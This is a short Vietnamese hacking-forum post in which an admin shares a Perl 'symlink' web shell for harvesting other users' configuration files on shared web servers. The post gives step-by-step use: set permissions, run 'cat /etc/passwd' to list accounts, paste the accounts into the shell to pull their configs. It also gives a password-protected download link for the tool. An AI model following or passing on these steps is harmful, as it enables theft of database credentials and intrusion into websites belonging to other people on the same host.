Share code sHELL symlink all config

admin

Administrator
Staff member
#1
HD sử dụng nhé :
- Con Shell này thuộc dạng perl nên run shell y hệt như cgi thoai chả có vấn đề gì cả :">
chmod 2 file la 755
run config.izo viết user vào cái khung to rồi ấn get config
B1 : command ở 1 con shell # cat /etc/passwd để lấy danh sách user cần symlink
B2 : past tất cả user vô con shell symlink và click get config
B3 : xem thành quả >:)
Download: http://upwap.ru/1991148
pass: buidoi.net
 

Facebook Comments

New posts Latest threads Latest profile posts

Top